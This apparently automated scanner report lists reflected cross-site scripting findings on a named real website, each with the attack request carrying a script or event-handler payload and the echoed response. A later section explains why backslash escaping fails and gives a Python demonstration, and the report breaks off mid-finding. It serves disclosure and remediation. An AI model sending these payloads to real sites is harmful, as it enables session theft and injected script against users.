<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviced797b<script>alert(1)</script>4b6f32cfc6eb27974/software-scripts/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.5255. http://www.resellerbase.com/web-service/software-scripts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 43ea7<script>alert(1)</script>eefb4585f53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service43ea7<script>alert(1)</script>eefb4585f53/software-scripts/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service43ea7<script>alert(1)</script>eefb4585f53/software-scripts/ was not found on this server.</p>
...[SNIP]...

2.5256. http://www.resellerbase.com/web-service/software-scripts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3db2f<script>alert(1)</script>e4dec4598da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts3db2f<script>alert(1)</script>e4dec4598da/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts3db2f<script>alert(1)</script>e4dec4598da/ was not found on this server.</p>
...[SNIP]...

2.5257. http://www.resellerbase.com/web-service/software-scripts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9a829<script>alert(1)</script>3224a76d17d9474bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/software-scripts9a829<script>alert(1)</script>3224a76d17d9474bc/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts9a829<script>alert(1)</script>3224a76d17d9474bc/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.5258. http://www.resellerbase.com/web-service/software-scripts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4f0a1<script>alert(1)</script>c5aa4b6b7c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/?4f0a1<script>alert(1)</script>c5aa4b6b7c8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/?4f0a1<script>alert(1)</script>c5aa4b6b7c8=1 was not found on this server.</p>
...[SNIP]...

2.5259. http://www.resellerbase.com/web-service/software-scripts/ [select parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload 58867<a>17ba5af46c7 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f58867<a>17ba5af46c7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f58867<a>17ba5af46c7 was not found on this server.</p>
...[SNIP]...

2.5260. http://www.resellerbase.com/web-service/software-scripts/googlepr.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b607a<script>alert(1)</script>132f746edf1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviceb607a<script>alert(1)</script>132f746edf1/software-scripts/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceb607a<script>alert(1)</script>132f746edf1/software-scripts/googlepr.php was not found on this server.</p>
...[SNIP]...

2.5261. http://www.resellerbase.com/web-service/software-scripts/googlepr.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 503b5<script>alert(1)</script>21ae601c06 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts503b5<script>alert(1)</script>21ae601c06/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts503b5<script>alert(1)</script>21ae601c06/googlepr.php was not found on this server.</p>
...[SNIP]...

2.5262. http://www.resellerbase.com/web-service/software-scripts/googlepr.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/googlepr.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a2a59<script>alert(1)</script>6e897720f0b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/googlepr.phpa2a59<script>alert(1)</script>6e897720f0b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/googlepr.phpa2a59<script>alert(1)</script>6e897720f0b was not found on this server.</p>
...[SNIP]...

2.5263. http://www.resellerbase.com/web-service/software-scripts/googlepr.php [link_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload 89725<a>ce806a0bf52 was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/googlepr.php?link_id=2389725<a>ce806a0bf52 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/googlepr.php?link_id=2389725<a>ce806a0bf52 was not found on this server.</p>
...[SNIP]...

2.5264. http://www.resellerbase.com/web-service/software-scripts/googlepr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 97776<script>alert(1)</script>72a2d919b91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/googlepr.php?97776<script>alert(1)</script>72a2d919b91=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/googlepr.php?97776<script>alert(1)</script>72a2d919b91=1 was not found on this server.</p>
...[SNIP]...

2.5265. http://www.resellerbase.com/web-service/software-scripts/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 99fea<script>alert(1)</script>3f8ae2ed2a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service99fea<script>alert(1)</script>3f8ae2ed2a6/software-scripts/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service99fea<script>alert(1)</script>3f8ae2ed2a6/software-scripts/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5266. http://www.resellerbase.com/web-service/software-scripts/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 24195<script>alert(1)</script>9622ce09ac6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts24195<script>alert(1)</script>9622ce09ac6/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts24195<script>alert(1)</script>9622ce09ac6/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5267. http://www.resellerbase.com/web-service/software-scripts/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 571f7<script>alert(1)</script>2d3f13859e5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/search.php571f7<script>alert(1)</script>2d3f13859e5?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/search.php571f7<script>alert(1)</script>2d3f13859e5?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5268. http://www.resellerbase.com/web-service/software-scripts/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 5c753<a>70f98dec54a was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/search.php?keyword=search...&Submit3=Search5c753<a>70f98dec54a&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/search.php?keyword=search...&Submit3=Search5c753<a>70f98dec54a&opt=2 was not found on this server.</p>
...[SNIP]...

2.5269. http://www.resellerbase.com/web-service/software-scripts/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a5f9"><img%20src%3da%20onerror%3dalert(1)>2d567fb479e was submitted in the cat parameter. This input was echoed as 8a5f9\"><img src=a onerror=alert(1)>2d567fb479e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The backslash that appears before the double quote in the echoed value shows that the application escapes input for a string or SQL context (the behaviour of PHP's addslashes() or the magic_quotes_gpc setting) rather than for HTML. A backslash has no meaning inside an HTML attribute value: the browser still ends the href attribute at the first ", closes the <a> start tag at the following >, and parses the injected <img> element, whose onerror handler runs because the image source a does not load. The fix is to HTML-encode the value at the point of output (htmlspecialchars($cat, ENT_QUOTES) in PHP, which turns " into &quot; and < into &lt;) and, since cat appears to be a numeric category id, to reject non-numeric values before they are used at all.

Request

GET /web-service/software-scripts/search.php?cat=148a5f9"><img%20src%3da%20onerror%3dalert(1)>2d567fb479e&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:45:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=148a5f9\"><img src=a onerror=alert(1)>2d567fb479e">
...[SNIP]...

2.5270. http://www.resellerbase.com/web-service/software-scripts/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c1d0"><img%20src%3da%20onerror%3dalert(1)>6c3ae9242f33c4dd1 was submitted in the cat parameter. This input was echoed as 9c1d0\"><img src=a onerror=alert(1)>6c3ae9242f33c4dd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

As in 2.5269, the backslash inserted before the quote is string-literal escaping (addslashes() or magic_quotes_gpc in PHP), not HTML encoding; the browser still terminates the href attribute at the quote and parses the injected <img> element, whose onerror handler fires. This variant differs from 2.5269 only in carrying the sort_by and sort_order parameters and in having originally been a POST; the sink, the add.php link in the category listing, is the same, so both are one defect.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/software-scripts/search.php?cat=149c1d0"><img%20src%3da%20onerror%3dalert(1)>6c3ae9242f33c4dd1&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/search.php?cat=14&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:45:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=149c1d0\"><img src=a onerror=alert(1)>6c3ae9242f33c4dd1">
...[SNIP]...
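
What the backslash in the echoed value does and does not do, shown as an added example that is not part of the scanner report or of the site's code: the script emulates PHP's addslashes() behaviour, renders the add.php link the way findings 2.5269 and 2.5270 show it, and feeds the result to an HTML parser to show that the <img> element and its onerror attribute survive, while the same value passed through HTML entity encoding yields a single <a> element. The link template and the addslashes emulation are assumptions about the server side; the payload is the one from 2.5269.

```python
"""Added example: why backslash-escaping a quote does not prevent XSS in an
HTML attribute. Reproduces the sink in findings 2.5269/2.5270 offline.
The link template and the addslashes() emulation are assumptions about the
PHP side of resellerbase.com; the payload is the one from finding 2.5269.
"""
import re
from html import escape
from html.parser import HTMLParser


def addslashes(s: str) -> str:
    """Emulate PHP addslashes()/magic_quotes_gpc: backslash before ' " and \\ (assumed server behaviour)."""
    return re.sub(r'([\'"\\])', r'\\\1', s)


def html_attr_encode(s: str) -> str:
    """The encoding that is actually right for a double-quoted attribute value."""
    return escape(s, quote=True)


# Assumed server-side template for the link seen in the response (the real PHP is not on the page).
LINK_TEMPLATE = '<a href="http://www.resellerbase.com/add.php?cat={cat}">Add</a>'


def render_link(cat: str, encoder) -> str:
    """Build the add.php link with the cat value passed through the given encoder."""
    return LINK_TEMPLATE.format(cat=encoder(cat))


class ElementCollector(HTMLParser):
    """Record every start tag with its attributes, as the browser's tokenizer sees them."""

    def __init__(self) -> None:
        super().__init__()
        self.elements = []

    def handle_starttag(self, tag, attrs):
        self.elements.append((tag, dict(attrs)))


def elements_in(markup: str):
    """Return [(tag, {attr: value}), ...] for the start tags found in markup."""
    parser = ElementCollector()
    parser.feed(markup)
    parser.close()
    return parser.elements


def has_event_handler(markup: str) -> bool:
    """True when some element carries an on* attribute, i.e. injected script would execute."""
    return any(name.startswith("on") for _, attrs in elements_in(markup) for name in attrs)


# Payload from finding 2.5269 after URL decoding, appended to the genuine category id 14.
PAYLOAD = '148a5f9"><img src=a onerror=alert(1)>2d567fb479e'

if __name__ == "__main__":
    for name, encoder in (("addslashes", addslashes), ("htmlspecialchars", html_attr_encode)):
        markup = render_link(PAYLOAD, encoder)
        tags = [tag for tag, _ in elements_in(markup)]
        print(f"{name:16} exploitable={has_event_handler(markup)!s:5} elements={tags}")
        print("    " + markup)
```

With addslashes the parser sees two elements, a and img, and img carries onerror=alert(1); with entity encoding it sees only the a element, whose href simply contains the literal payload text. html.parser is not a browser, but its attribute tokenization follows the same rule that matters here: nothing but a matching quote character ends a quoted attribute value.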

2.5271. http://www.resellerbase.com/web-service/software-scripts/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
